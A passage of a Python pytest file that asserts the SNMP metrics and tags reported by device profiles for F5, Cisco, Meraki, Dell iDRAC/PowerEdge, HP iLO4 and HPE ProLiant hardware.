'snmp.{}'.format(metric), metric_type=aggregator.RATE, tags=interface_tags, count=1 ) for metric in IF_GAUGES: for interface in interfaces: aggregator.assert_metric( 'snmp.{}'.format(metric), metric_type=aggregator.GAUGE, tags=['interface:{}'.format(interface)] + tags, count=1, ) for version in ['ipv4', 'ipv6']: ip_tags = ['ipversion:{}'.format(version)] + tags for metric in IP_COUNTS: aggregator.assert_metric( 'snmp.{}'.format(metric), metric_type=aggregator.MONOTONIC_COUNT, tags=ip_tags, count=1 ) for metric in LTM_GAUGES: aggregator.assert_metric('snmp.{}'.format(metric), metric_type=aggregator.GAUGE, tags=tags, count=1) servers = ['server1', 'server2', 'server3'] for server in servers: server_tags = tags + ['server:{}'.format(server)] for metric in LTM_VIRTUAL_SERVER_GAUGES: aggregator.assert_metric( 'snmp.{}'.format(metric), metric_type=aggregator.GAUGE, tags=server_tags, count=1, ) for metric in LTM_VIRTUAL_SERVER_COUNTS: aggregator.assert_metric( 'snmp.{}'.format(metric), metric_type=aggregator.MONOTONIC_COUNT, tags=server_tags, count=1, ) for metric in LTM_VIRTUAL_SERVER_RATES: aggregator.assert_metric( 'snmp.{}'.format(metric), metric_type=aggregator.RATE, tags=server_tags, count=1, ) nodes = ['node1', 'node2', 'node3'] for node in nodes: node_tags = tags + ['node:{}'.format(node)] for metric in LTM_NODES_GAUGES: aggregator.assert_metric('snmp.{}'.format(metric), metric_type=aggregator.GAUGE, tags=node_tags, count=1) for metric in LTM_NODES_COUNTS: aggregator.assert_metric( 'snmp.{}'.format(metric), metric_type=aggregator.MONOTONIC_COUNT, tags=node_tags, count=1 ) for metric in LTM_NODES_RATES: aggregator.assert_metric('snmp.{}'.format(metric), metric_type=aggregator.RATE, tags=node_tags, count=1) pools = ['pool1', 'pool2'] for pool in pools: pool_tags = tags + ['pool:{}'.format(pool)] for metric in LTM_POOL_GAUGES: aggregator.assert_metric('snmp.{}'.format(metric), metric_type=aggregator.GAUGE, tags=pool_tags, count=1) for metric in LTM_POOL_COUNTS: aggregator.assert_metric( 'snmp.{}'.format(metric), metric_type=aggregator.MONOTONIC_COUNT, tags=pool_tags, count=1 ) for metric in LTM_POOL_RATES: aggregator.assert_metric('snmp.{}'.format(metric), metric_type=aggregator.RATE, tags=pool_tags, count=1) pool_members = [('pool1', 'node1'), ('pool1', 'node2'), ('pool2', 'node3')] for pool, node in pool_members: pool_member_tags = tags + ['pool:{}'.format(pool), 'node:{}'.format(node)] for metric in LTM_POOL_MEMBER_GAUGES: aggregator.assert_metric( 'snmp.{}'.format(metric), metric_type=aggregator.GAUGE, tags=pool_member_tags, count=1 ) for metric in LTM_POOL_MEMBER_COUNTS: aggregator.assert_metric( 'snmp.{}'.format(metric), metric_type=aggregator.MONOTONIC_COUNT, tags=pool_member_tags, count=1 ) for metric in LTM_POOL_MEMBER_RATES: aggregator.assert_metric( 'snmp.{}'.format(metric), metric_type=aggregator.RATE, tags=pool_member_tags, count=1 ) aggregator.assert_metric('snmp.sysUpTimeInstance', count=1) aggregator.assert_all_metrics_covered() @pytest.mark.usefixtures("dd_environment") def test_router(aggregator): run_profile_check('network') common_tags = common.CHECK_TAGS + ['snmp_profile:generic-router'] common.assert_common_metrics(aggregator, common_tags) for interface in ['eth0', 'eth1']: tags = ['interface:{}'.format(interface)] + common_tags for metric in IF_COUNTS: aggregator.assert_metric( 'snmp.{}'.format(metric), metric_type=aggregator.MONOTONIC_COUNT, tags=tags, count=1 ) for metric in IF_RATES: aggregator.assert_metric('snmp.{}'.format(metric), metric_type=aggregator.RATE, tags=tags, count=1) for metric in IF_GAUGES: aggregator.assert_metric('snmp.{}'.format(metric), metric_type=aggregator.GAUGE, tags=tags, count=1) for metric in TCP_COUNTS: aggregator.assert_metric( 'snmp.{}'.format(metric), metric_type=aggregator.MONOTONIC_COUNT, tags=common_tags, count=1 ) for metric in TCP_GAUGES: aggregator.assert_metric('snmp.{}'.format(metric), metric_type=aggregator.GAUGE, tags=common_tags, count=1) for metric in UDP_COUNTS: aggregator.assert_metric( 'snmp.{}'.format(metric), metric_type=aggregator.MONOTONIC_COUNT, tags=common_tags, count=1 ) for version in ['ipv4', 'ipv6']: tags = ['ipversion:{}'.format(version)] + common_tags for metric in IP_COUNTS + IPX_COUNTS: aggregator.assert_metric( 'snmp.{}'.format(metric), metric_type=aggregator.MONOTONIC_COUNT, tags=tags, count=1 ) for metric in IP_IF_COUNTS: for interface in ['17', '21']: tags = ['ipversion:{}'.format(version), 'interface:{}'.format(interface)] + common_tags aggregator.assert_metric( 'snmp.{}'.format(metric), metric_type=aggregator.MONOTONIC_COUNT, tags=tags, count=1 ) aggregator.assert_all_metrics_covered() @pytest.mark.usefixtures("dd_environment") def test_f5_router(aggregator): # Use the generic profile against the f5 device instance = common.generate_instance_config([]) instance['community_string'] = 'f5' instance['enforce_mib_constraints'] = False init_config = {'profiles': {'router': {'definition_file': 'generic-router.yaml'}}} check = SnmpCheck('snmp', init_config, [instance]) check.check(instance) interfaces = ['1.0', 'mgmt', '/Common/internal', '/Common/http-tunnel', '/Common/socks-tunnel'] common_tags = ['snmp_profile:router', 'snmp_host:f5-big-ip-adc-good-byol-1-vm.c.datadog-integrations-lab.internal'] common_tags.extend(common.CHECK_TAGS) common.assert_common_metrics(aggregator, common_tags) for interface in interfaces: tags = ['interface:{}'.format(interface)] + common_tags for metric in IF_COUNTS: aggregator.assert_metric( 'snmp.{}'.format(metric), metric_type=aggregator.MONOTONIC_COUNT, tags=tags, count=1 ) for metric in IF_RATES: aggregator.assert_metric('snmp.{}'.format(metric), metric_type=aggregator.RATE, tags=tags, count=1) for metric in IF_GAUGES: aggregator.assert_metric('snmp.{}'.format(metric), metric_type=aggregator.GAUGE, tags=tags, count=1) for version in ['ipv4', 'ipv6']: tags = ['ipversion:{}'.format(version)] + common_tags for metric in IP_COUNTS: aggregator.assert_metric( 'snmp.{}'.format(metric), metric_type=aggregator.MONOTONIC_COUNT, tags=tags, count=1 ) aggregator.assert_metric('snmp.sysUpTimeInstance', count=1) aggregator.assert_all_metrics_covered() @pytest.mark.usefixtures("dd_environment") def test_cisco_3850(aggregator): run_profile_check('3850') # We're not covering all interfaces interfaces = ["Gi1/0/{}".format(i) for i in range(1, 48)] common_tags = common.CHECK_TAGS + ['snmp_host:Cat-3850-4th-Floor.companyname.local', 'snmp_profile:cisco-3850'] common.assert_common_metrics(aggregator, common_tags) for interface in interfaces: tags = ['interface:{}'.format(interface)] + common_tags for metric in IF_COUNTS: aggregator.assert_metric( 'snmp.{}'.format(metric), metric_type=aggregator.MONOTONIC_COUNT, tags=tags, count=1 ) for metric in IF_GAUGES: aggregator.assert_metric('snmp.{}'.format(metric), metric_type=aggregator.GAUGE, tags=tags, count=1) for metric in IF_RATES: aggregator.assert_metric('snmp.{}'.format(metric), metric_type=aggregator.RATE, tags=tags, count=1) for metric in IP_COUNTS + IPX_COUNTS: tags = common_tags + ['ipversion:ipv6'] aggregator.assert_metric('snmp.{}'.format(metric), metric_type=aggregator.MONOTONIC_COUNT, tags=tags, count=1) for metric in TCP_COUNTS: aggregator.assert_metric( 'snmp.{}'.format(metric), metric_type=aggregator.MONOTONIC_COUNT, tags=common_tags, count=1 ) for metric in TCP_GAUGES: aggregator.assert_metric('snmp.{}'.format(metric), metric_type=aggregator.GAUGE, tags=common_tags, count=1) for metric in UDP_COUNTS: aggregator.assert_metric( 'snmp.{}'.format(metric), metric_type=aggregator.MONOTONIC_COUNT, tags=common_tags, count=1 ) sensors = [1006, 1007, 1008, 2006, 2007, 2008] for sensor in sensors: tags = ['sensor_id:{}'.format(sensor), 'sensor_type:8'] + common_tags aggregator.assert_metric('snmp.entSensorValue', metric_type=aggregator.GAUGE, tags=tags, count=1) frus = [1001, 1010, 2001, 2010] for fru in frus: tags = ['fru:{}'.format(fru)] + common_tags for metric in FRU_METRICS: aggregator.assert_metric('snmp.{}'.format(metric), metric_type=aggregator.GAUGE, tags=tags, count=1) cpus = [1000, 2000] for cpu in cpus: tags = ['cpu:{}'.format(cpu)] + common_tags for metric in CPU_METRICS: aggregator.assert_metric('snmp.{}'.format(metric), metric_type=aggregator.GAUGE, tags=tags, count=1) for interface in interfaces: tags = ['interface:{}'.format(interface)] + common_tags for metric in CIE_METRICS: aggregator.assert_metric('snmp.{}'.format(metric), metric_type=aggregator.GAUGE, tags=tags, count=1) aggregator.assert_metric('snmp.cieIfResetCount', metric_type=aggregator.MONOTONIC_COUNT, tags=tags, count=1) for source in range(1, 3): env_tags = ['power_source:{}'.format(source)] aggregator.assert_metric( 'snmp.ciscoEnvMonSupplyState', metric_type=aggregator.GAUGE, tags=env_tags + common_tags ) aggregator.assert_metric( 'snmp.ciscoEnvMonFanState', metric_type=aggregator.GAUGE, tags=common_tags, ) aggregator.assert_metric('snmp.cswStackPortOperStatus', metric_type=aggregator.GAUGE) for switch, mac_addr in [(1, '0x046c9d42b080'), (2, '0xdccec1430680')]: tags = ['entity_name:Switch {}'.format(switch), 'mac_addr:{}'.format(mac_addr)] + common_tags aggregator.assert_metric('snmp.cswSwitchState', metric_type=aggregator.GAUGE, tags=tags) frus = [1011, 1012, 1013, 2011, 2012, 2013] for fru in frus: tags = ['fru:{}'.format(fru)] + common_tags aggregator.assert_metric( 'snmp.cefcFanTrayOperStatus', metric_type=aggregator.GAUGE, tags=['fru:{}'.format(fru)] + common_tags ) for metrics in MEMORY_METRICS: for pool in ['Processor', 'IOS Process stack']: tags = ['mem_pool_name:{}'.format(pool)] + common_tags aggregator.assert_metric('snmp.{}'.format(metrics), metric_type=aggregator.GAUGE, tags=tags) neighbor_metrics = [ ('ospfNbrEvents', aggregator.RATE), ('ospfNbrState', aggregator.GAUGE), ('ospfNbrLsRetransQLen', aggregator.GAUGE), ] for metric, metric_type in neighbor_metrics: tags = ['neighbor_ip:192.29.116.26', 'neighbor_id:192.29.66.79'] + common_tags aggregator.assert_metric('snmp.{}'.format(metric), metric_type=metric_type, tags=tags, count=1) lls_metrics = ['ospfIfRetransInterval', 'ospfIfState'] for metric in lls_metrics: tags = ['ospf_ip_addr:192.29.116.25'] + common_tags aggregator.assert_metric('snmp.{}'.format(metric), metric_type=aggregator.GAUGE, tags=tags, count=1) for temp_index in [1006, 1007, 1008, 2006, 2007, 2008]: env_tag = ['temp_index:{}'.format(temp_index), 'temp_state:1'] aggregator.assert_metric( 'snmp.ciscoEnvMonTemperatureStatusValue', metric_type=aggregator.GAUGE, tags=env_tag + common_tags ) aggregator.assert_metric('snmp.sysUpTimeInstance', count=1) aggregator.assert_all_metrics_covered() @pytest.mark.usefixtures("dd_environment") def test_meraki_cloud_controller(aggregator): run_profile_check('meraki-cloud-controller') common_tags = common.CHECK_TAGS + ['snmp_profile:meraki-cloud-controller', 'snmp_host:dashboard.meraki.com'] common.assert_common_metrics(aggregator, common_tags) dev_metrics = ['devStatus', 'devClientCount'] dev_tags = ['device:Gymnasium', 'product:MR16-HW', 'network:L_NETWORK'] + common_tags for metric in dev_metrics: aggregator.assert_metric('snmp.{}'.format(metric), metric_type=aggregator.GAUGE, tags=dev_tags, count=1) if_tags = ['interface:wifi0', 'index:4'] + common_tags if_metrics = ['devInterfaceSentPkts', 'devInterfaceRecvPkts', 'devInterfaceSentBytes', 'devInterfaceRecvBytes'] for metric in if_metrics: aggregator.assert_metric('snmp.{}'.format(metric), metric_type=aggregator.GAUGE, tags=if_tags, count=1) # IF-MIB if_tags = ['interface:eth0'] + common_tags for metric in IF_COUNTS: aggregator.assert_metric( 'snmp.{}'.format(metric), metric_type=aggregator.MONOTONIC_COUNT, tags=if_tags, count=1 ) for metric in IF_GAUGES: aggregator.assert_metric('snmp.{}'.format(metric), metric_type=aggregator.GAUGE, tags=if_tags, count=1) for metric in IF_RATES: aggregator.assert_metric('snmp.{}'.format(metric), metric_type=aggregator.RATE, tags=if_tags, count=1) aggregator.assert_metric('snmp.sysUpTimeInstance', count=1) aggregator.assert_all_metrics_covered() @pytest.mark.usefixtures("dd_environment") def test_idrac(aggregator): run_profile_check('idrac') interfaces = ['eth0', 'en1'] common_tags = common.CHECK_TAGS + ['snmp_profile:idrac'] common.assert_common_metrics(aggregator, common_tags) for interface in interfaces: tags = ['adapter:{}'.format(interface)] + common_tags for count in ADAPTER_IF_COUNTS: aggregator.assert_metric( 'snmp.{}'.format(count), metric_type=aggregator.MONOTONIC_COUNT, tags=tags, count=1 ) indexes = ['26', '29'] for index in indexes: tags = ['chassis_index:{}'.format(index)] + common_tags for gauge in SYSTEM_STATUS_GAUGES: aggregator.assert_metric('snmp.{}'.format(gauge), metric_type=aggregator.GAUGE, tags=tags, count=1) powers = ['supply1', 'supply2'] for power in powers: tags = ['supply_name:{}'.format(power)] + common_tags aggregator.assert_metric('snmp.enclosurePowerSupplyState', metric_type=aggregator.GAUGE, tags=tags, count=1) disks = ['disk1', 'disk2'] for disk in disks: tags = ['disk_name:{}'.format(disk)] + common_tags for gauge in DISK_GAUGES: aggregator.assert_metric('snmp.{}'.format(gauge), metric_type=aggregator.GAUGE, tags=tags, count=1) batteries = ['battery1', 'battery2'] for battery_name in batteries: tags = ['battery_name:{}'.format(battery_name)] + common_tags aggregator.assert_metric('snmp.{}'.format("batteryState"), metric_type=aggregator.GAUGE, tags=tags, count=1) controllers = ['controller1', 'controller2'] for controller in controllers: tags = ['controller_name:{}'.format(controller)] + common_tags aggregator.assert_metric( 'snmp.{}'.format("controllerRollUpStatus"), metric_type=aggregator.GAUGE, tags=tags, count=1 ) devices = ['device1', 'device2'] indexes = ['10', '20'] for device, index in zip(devices, indexes): tags = ['device_descr_name:{}'.format(device), 'chassis_index:{}'.format(index)] + common_tags aggregator.assert_metric('snmp.{}'.format("pCIDeviceStatus"), metric_type=aggregator.GAUGE, tags=tags, count=1) slots = ['slot1', 'slot2'] indexes = ['19', '21'] for slot, index in zip(slots, indexes): tags = ['slot_name:{}'.format(slot), 'chassis_index:{}'.format(index)] + common_tags aggregator.assert_metric('snmp.{}'.format("systemSlotStatus"), metric_type=aggregator.GAUGE, tags=tags, count=1) tag_mappings = [('29', 'device2', '0x9e00e0291401'), ('3', 'device1', '0x9e00e0291401')] for index, device, mac in tag_mappings: tags = [ 'chassis_index:{}'.format(index), 'device_fqdd:{}'.format(device), 'mac_addr:{}'.format(mac), ] + common_tags aggregator.assert_metric( 'snmp.{}'.format("networkDeviceStatus"), metric_type=aggregator.GAUGE, tags=tags, count=1 ) indexes = ['3', '31'] for index in indexes: tags = ['chassis_index:{}'.format(index)] + common_tags aggregator.assert_metric('snmp.{}'.format("systemBIOSStatus"), metric_type=aggregator.GAUGE, tags=tags, count=1) indexes = ['9', '18'] probe_types = ['26', '26'] for index, probe_type in zip(indexes, probe_types): tags = ['chassis_index:{}'.format(index), 'probe_type:{}'.format(probe_type)] + common_tags for gauge in PROBE_GAUGES: aggregator.assert_metric('snmp.{}'.format(gauge), metric_type=aggregator.GAUGE, tags=tags, count=1) indexes = ['12', '22'] probe_types = ['6', '3'] for index, probe_type in zip(indexes, probe_types): tags = ['chassis_index:{}'.format(index), 'probe_type:{}'.format(probe_type)] + common_tags for gauge in VOLTAGE_GAUGES: aggregator.assert_metric('snmp.{}'.format(gauge), metric_type=aggregator.GAUGE, tags=tags, count=1) indexes = ['29', '22'] device_types = ['26', '4'] for index, device_type in zip(indexes, device_types): tags = ['chassis_index:{}'.format(index), 'device_type:{}'.format(device_type)] + common_tags aggregator.assert_metric( 'snmp.{}'.format("memoryDeviceStatus"), metric_type=aggregator.GAUGE, tags=tags, count=1 ) for gauge in DRS_GAUGES: aggregator.assert_metric('snmp.{}'.format(gauge), metric_type=aggregator.GAUGE, tags=common_tags, count=1) aggregator.assert_all_metrics_covered() @pytest.mark.usefixtures("dd_environment") def test_cisco_nexus(aggregator): run_profile_check('cisco_nexus') interfaces = ["GigabitEthernet1/0/{}".format(i) for i in range(1, 9)] common_tags = common.CHECK_TAGS + ['snmp_host:Nexus-eu1.companyname.managed', 'snmp_profile:cisco-nexus'] common.assert_common_metrics(aggregator, common_tags) for interface in interfaces: tags = ['interface:{}'.format(interface)] + common_tags aggregator.assert_metric('snmp.cieIfResetCount', metric_type=aggregator.MONOTONIC_COUNT, tags=tags, count=1) for interface in interfaces: tags = ['interface:{}'.format(interface)] + common_tags for metric in IF_COUNTS: aggregator.assert_metric( 'snmp.{}'.format(metric), metric_type=aggregator.MONOTONIC_COUNT, tags=tags, count=1 ) for metric in IF_RATES: aggregator.assert_metric('snmp.{}'.format(metric), metric_type=aggregator.RATE, tags=tags, count=1) for metric in IF_GAUGES: aggregator.assert_metric('snmp.{}'.format(metric), metric_type=aggregator.GAUGE, tags=tags, count=1) for metric in TCP_COUNTS: aggregator.assert_metric( 'snmp.{}'.format(metric), metric_type=aggregator.MONOTONIC_COUNT, tags=common_tags, count=1 ) for metric in TCP_GAUGES: aggregator.assert_metric('snmp.{}'.format(metric), metric_type=aggregator.GAUGE, tags=common_tags, count=1) for metric in UDP_COUNTS: aggregator.assert_metric( 'snmp.{}'.format(metric), metric_type=aggregator.MONOTONIC_COUNT, tags=common_tags, count=1 ) sensors = [1, 9, 11, 12, 12, 14, 17, 26, 29, 31] for sensor in sensors: tags = ['sensor_id:{}'.format(sensor), 'sensor_type:8'] + common_tags aggregator.assert_metric('snmp.entSensorValue', metric_type=aggregator.GAUGE, tags=tags, count=1) frus = [6, 7, 15, 16, 19, 27, 30, 31] for fru in frus: tags = ['fru:{}'.format(fru)] + common_tags for metric in FRU_METRICS: aggregator.assert_metric('snmp.{}'.format(metric), metric_type=aggregator.GAUGE, tags=tags, count=1) cpus = [3173, 6692, 11571, 19529, 30674, 38253, 52063, 54474, 55946, 63960] for cpu in cpus: tags = ['cpu:{}'.format(cpu)] + common_tags for metric in CPU_METRICS: aggregator.assert_metric('snmp.{}'.format(metric), metric_type=aggregator.GAUGE, tags=tags, count=1) for (index, state) in [(3, 3), (6, 6), (8, 6), (11, 6), (13, 3), (14, 6), (20, 6), (21, 4), (31, 5)]: aggregator.assert_metric( 'snmp.ciscoEnvMonTemperatureStatusValue', metric_type=aggregator.GAUGE, tags=['temp_state:{}'.format(state), 'temp_index:{}'.format(index)] + common_tags, ) aggregator.assert_metric( 'snmp.ciscoEnvMonSupplyState', metric_type=aggregator.GAUGE, tags=['power_source:1'] + common_tags, ) fan_indices = [4, 6, 7, 16, 21, 22, 25, 27] for index in fan_indices: tags = ['fan_status_index:{}'.format(index)] + common_tags aggregator.assert_metric( 'snmp.ciscoEnvMonFanState', metric_type=aggregator.GAUGE, tags=tags, ) aggregator.assert_metric('snmp.cswStackPortOperStatus', metric_type=aggregator.GAUGE) aggregator.assert_metric( 'snmp.cswSwitchState', metric_type=aggregator.GAUGE, tags=['mac_addr:0xffffffffffff'] + common_tags ) frus = [2, 7, 8, 21, 26, 27, 30, 31] for fru in frus: tags = ['fru:{}'.format(fru)] + common_tags aggregator.assert_metric( 'snmp.cefcFanTrayOperStatus', metric_type=aggregator.GAUGE, tags=['fru:{}'.format(fru)] + common_tags ) aggregator.assert_metric('snmp.sysUpTimeInstance', count=1) aggregator.assert_all_metrics_covered() @pytest.mark.usefixtures("dd_environment") def test_dell_poweredge(aggregator): run_profile_check('dell-poweredge') # Poweredge sys_mem_gauges = [ 'operatingSystemMemoryAvailablePhysicalSize', 'operatingSystemMemoryTotalPageFileSize', 'operatingSystemMemoryAvailablePageFileSize', 'operatingSystemMemoryTotalVirtualSize', 'operatingSystemMemoryAvailableVirtualSize', ] power_supply_gauges = [ 'powerSupplyStatus', 'powerSupplyOutputWatts', 'powerSupplyMaximumInputVoltage', 'powerSupplyCurrentInputVoltage', ] temperature_probe_gauges = ['temperatureProbeStatus', 'temperatureProbeReading'] processor_device_gauges = ['processorDeviceStatus', 'processorDeviceThreadCount'] cache_device_gauges = ['cacheDeviceStatus', 'cacheDeviceMaximumSize', 'cacheDeviceCurrentSize'] memory_device_gauges = ['memoryDeviceStatus', 'memoryDeviceFailureModes'] idrac_gauges = ( ['batteryState', 'controllerRollUpStatus', 'pCIDeviceStatus', 'systemSlotStatus', 'systemBIOSStatus'] + VOLTAGE_GAUGES + PROBE_GAUGES ) common_tags = common.CHECK_TAGS + ['snmp_profile:dell-poweredge'] common.assert_common_metrics(aggregator, common_tags) chassis_indexes = [29, 31] for chassis_index in chassis_indexes: tags = ['chassis_index:{}'.format(chassis_index)] + common_tags for metric in sys_mem_gauges: aggregator.assert_metric('snmp.{}'.format(metric), metric_type=aggregator.GAUGE, tags=tags, at_least=1) indexes = [5, 17] for index in indexes: tags = ['chassis_index:4', 'index:{}'.format(index)] + common_tags for metric in power_supply_gauges: aggregator.assert_metric('snmp.{}'.format(metric), metric_type=aggregator.GAUGE, tags=tags, at_least=1) indexes = [13] for index in indexes: tags = ['chassis_index:18', 'index:{}'.format(index)] + common_tags for metric in temperature_probe_gauges: aggregator.assert_metric('snmp.{}'.format(metric), metric_type=aggregator.GAUGE, tags=tags, at_least=1) indexes = [17, 28] for index in indexes: tags = ['chassis_index:5', 'index:{}'.format(index)] + common_tags for metric in processor_device_gauges: aggregator.assert_metric('snmp.{}'.format(metric), metric_type=aggregator.GAUGE, tags=tags, at_least=1) indexes = [15, 27] for index in indexes: tags = ['chassis_index:11', 'index:{}'.format(index)] + common_tags for metric in cache_device_gauges: aggregator.assert_metric('snmp.{}'.format(metric), metric_type=aggregator.GAUGE, tags=tags, at_least=1) serial_numbers = ['forward zombies acted Jaded', 'kept oxen their their oxen oxen'] for serial_number in serial_numbers: tags = ['serial_number_name:{}'.format(serial_number), 'chassis_index:1'] + common_tags for metric in memory_device_gauges: aggregator.assert_metric('snmp.{}'.format(metric), metric_type=aggregator.GAUGE, tags=tags, at_least=1) ip_addresses = ['66.97.1.103', '62.148.76.32', '45.3.243.155'] for ip_address in ip_addresses: tags = ['ip_address:{}'.format(ip_address)] + common_tags aggregator.assert_metric('snmp.networkDeviceStatus', metric_type=aggregator.GAUGE, tags=tags, at_least=1) # Intel Adapter interfaces = ['eth0', 'en1'] for interface in interfaces: tags = ['adapter:{}'.format(interface)] + common_tags for count in ADAPTER_IF_COUNTS: aggregator.assert_metric( 'snmp.{}'.format(count), metric_type=aggregator.MONOTONIC_COUNT, tags=tags, count=1 ) # IDRAC indexes = ['26', '29'] for index in indexes: tags = ['chassis_index:{}'.format(index)] + common_tags for gauge in SYSTEM_STATUS_GAUGES: aggregator.assert_metric('snmp.{}'.format(gauge), metric_type=aggregator.GAUGE, tags=tags, count=1) powers = ['supply1', 'supply2'] for power in powers: tags = ['supply_name:{}'.format(power)] + common_tags aggregator.assert_metric('snmp.enclosurePowerSupplyState', metric_type=aggregator.GAUGE, tags=tags, count=1) disks = ['disk1', 'disk2'] for disk in disks: tags = ['disk_name:{}'.format(disk)] + common_tags for gauge in DISK_GAUGES: aggregator.assert_metric('snmp.{}'.format(gauge), metric_type=aggregator.GAUGE, tags=tags, count=1) for gauge in idrac_gauges: aggregator.assert_metric('snmp.{}'.format(gauge), metric_type=aggregator.GAUGE) aggregator.assert_all_metrics_covered() @pytest.mark.usefixtures("dd_environment") def test_hp_ilo4(aggregator): run_profile_check('hp_ilo4') status_gauges = [ 'cpqHeCritLogCondition', 'cpqHeCorrMemLogStatus', 'cpqHeCorrMemLogCondition', 'cpqHeAsrStatus', 'cpqHeAsrPost', 'cpqHeAsrCondition', 'cpqHeAsrNetworkAccessStatus', 'cpqHeThermalCondition', 'cpqHeThermalTempStatus', 'cpqHeThermalSystemFanStatus', 'cpqHeThermalCpuFanStatus', 'cpqNicVtVirusActivity', 'cpqSm2CntlrServerPowerState', 'cpqSm2CntlrBatteryStatus', 'cpqSm2CntlrRemoteSessionStatus', 'cpqSm2CntlrInterfaceStatus', ] cpqhlth_counts = ['cpqHeAsrRebootCount', 'cpqHeCorrMemTotalErrs'] cpqhlth_gauges = ['cpqHeSysUtilEisaBusMin', 'cpqHePowerMeterCurrReading', 'cpqHeSysUtilLifeTime'] cpqsm2_gauges = [ 'cpqSm2CntlrBatteryPercentCharged', 'cpqSm2CntlrSelfTestErrors', 'cpqSm2EventTotalEntries', ] EMBEDDED = 2 PCMCIA = 3 card_locations = [EMBEDDED, PCMCIA] network_card_counts = [ 'cpqSm2NicXmitBytes', 'cpqSm2NicXmitTotalPackets', 'cpqSm2NicXmitDiscardPackets', 'cpqSm2NicXmitErrorPackets', 'cpqSm2NicXmitQueueLength', 'cpqSm2NicRecvBytes', 'cpqSm2NicRecvTotalPackets', 'cpqSm2NicRecvDiscardPackets', 'cpqSm2NicRecvErrorPackets', 'cpqSm2NicRecvUnknownPackets', ] interfaces = ['eth0', 'en1'] phys_adapter_counts = [ 'cpqNicIfPhysAdapterGoodTransmits', 'cpqNicIfPhysAdapterGoodReceives', 'cpqNicIfPhysAdapterBadTransmits', 'cpqNicIfPhysAdapterBadReceives', 'cpqNicIfPhysAdapterInOctets', 'cpqNicIfPhysAdapterOutOctets', ] phys_adapter_gauges = ['cpqNicIfPhysAdapterSpeed', 'cpqNicIfPhysAdapterSpeedMbps'] temperature_sensors = [1, 13, 28] batteries = [1, 3, 4, 5] common_tags = common.CHECK_TAGS + ['snmp_profile:hp-ilo4'] common.assert_common_metrics(aggregator, common_tags) for metric in status_gauges: aggregator.assert_metric('snmp.{}'.format(metric), metric_type=aggregator.GAUGE, tags=common_tags, count=1) for metric in cpqhlth_counts: aggregator.assert_metric( 'snmp.{}'.format(metric), metric_type=aggregator.MONOTONIC_COUNT, tags=common_tags, count=1 ) for metric in cpqhlth_gauges: aggregator.assert_metric('snmp.{}'.format(metric), metric_type=aggregator.GAUGE, tags=common_tags, count=1) for metric in cpqsm2_gauges: aggregator.assert_metric('snmp.{}'.format(metric), metric_type=aggregator.GAUGE, tags=common_tags, count=1) for index in temperature_sensors: tags = ['temperature_index:{}'.format(index)] + common_tags aggregator.assert_metric('snmp.cpqHeTemperatureCelsius', metric_type=aggregator.GAUGE, tags=tags, count=1) aggregator.assert_metric('snmp.cpqHeTemperatureCondition', metric_type=aggregator.GAUGE, tags=tags, count=1) for index in batteries: tags = ['battery_index:{}'.format(index)] + common_tags aggregator.assert_metric('snmp.cpqHeSysBatteryCondition', metric_type=aggregator.GAUGE, tags=tags, count=1) aggregator.assert_metric('snmp.cpqHeSysBatteryStatus', metric_type=aggregator.GAUGE, tags=tags, count=1) for location in card_locations: tags = ['nic_stats_location:{}'.format(location)] + common_tags for metric in network_card_counts: aggregator.assert_metric( 'snmp.{}'.format(metric), metric_type=aggregator.MONOTONIC_COUNT, tags=tags, count=1 ) for interface in interfaces: tags = ['interface:{}'.format(interface)] + common_tags for metric in phys_adapter_counts: aggregator.assert_metric( 'snmp.{}'.format(metric), metric_type=aggregator.MONOTONIC_COUNT, tags=tags, count=1 ) for metric in phys_adapter_gauges: aggregator.assert_metric('snmp.{}'.format(metric), metric_type=aggregator.GAUGE, tags=tags, count=1) aggregator.assert_all_metrics_covered() @pytest.mark.usefixtures("dd_environment") def test_proliant(aggregator): run_profile_check('hpe-proliant') common_tags = common.CHECK_TAGS + ['snmp_profile:hpe-proliant'] common.assert_common_metrics(aggregator, common_tags) for metric in TCP_COUNTS: aggregator.assert_metric( 'snmp.{}'.format(metric), metric_type=aggregator.MONOTONIC_COUNT, tags=common_tags, count=1 ) for metric in TCP_GAUGES: aggregator.assert_metric('snmp.{}'.format(metric), metric_type=aggregator.GAUGE, tags=common_tags, count=1) for metric in UDP_COUNTS: aggregator.assert_metric( 'snmp.{}'.format(metric), metric_type=aggregator.MONOTONIC_COUNT, tags=common_tags, count=1 ) cpu_gauges = [ "cpqSeCpuSlot", "cpqSeCpuSpeed", "cpqSeCpuStatus", "cpqSeCpuExtSpeed", "cpqSeCpuCore", "cpqSeCPUCoreMaxThreads", "cpqSeCpuPrimary", ] cpu_indexes = [0, 4, 6, 8, 13, 15, 26, 27] for idx in cpu_indexes: tags = ['cpu_index:{}'.format(idx)] + common_tags for metric in cpu_gauges: aggregator.assert_metric('snmp.{}'.format(metric), metric_type=aggregator.GAUGE, tags=tags, count=1) cpu_util_gauges = ["cpqHoCpuUtilMin", "cpqHoCpuUtilFiveMin", "cpqHoCpuUtilThirtyMin", "cpqHoCpuUtilHour"] cpu_unit_idx = [4, 7, 13, 20, 22, 23, 29] for idx in cpu_unit_idx: tags = ['cpu_unit_index:{}'.format(idx)] + common_tags for metric in cpu_util_gauges: aggregator.assert_metric('snmp.{}'.format(metric), metric_type=aggregator.GAUGE, tags=tags, count=1) file_sys_gauges = [ "cpqHoFileSysSpaceTotal", "cpqHoFileSysSpaceUsed", "cpqHoFileSysPercentSpaceUsed", "cpqHoFileSysAllocUnitsTotal", "cpqHoFileSysAllocUnitsUsed", "cpqHoFileSysStatus", ] file_sys_idx = [5, 8, 11, 15, 19, 21, 28, 30] for idx in file_sys_idx: tags = ['file_sys_index:{}'.format(idx)] + common_tags for metric in file_sys_gauges: aggregator.assert_metric('snmp.{}'.format(metric), metric_type=aggregator.GAUGE, tags=tags, count=1) memory_gauges = [ "cpqSiMemModuleSize", "cpqSiMemModuleType", "cpqSiMemModuleSpeed", "cpqSiMemModuleTechnology", "cpqSiMemModuleECCStatus", "cpqSiMemModuleFrequency", "cpqSiMemModuleCellStatus", ] memory_idx = [(6, 16), (7, 17), (7, 30), (8, 20), (10, 4), (15, 27), (20, 14), (21, 14), (23, 0), (28, 20)] for board_idx, mem_module_index in memory_idx: tags = ['mem_board_index:{}'.format(board_idx), "mem_module_index:{}".format(mem_module_index)] + common_tags for metric in memory_gauges: aggregator.assert_metric('snmp.{}'.format(metric), metric_type=aggregator.GAUGE, tags=tags, count=1) drive_counts = [ "cpqDaPhyDrvUsedReallocs", "cpqDaPhyDrvRefHours", 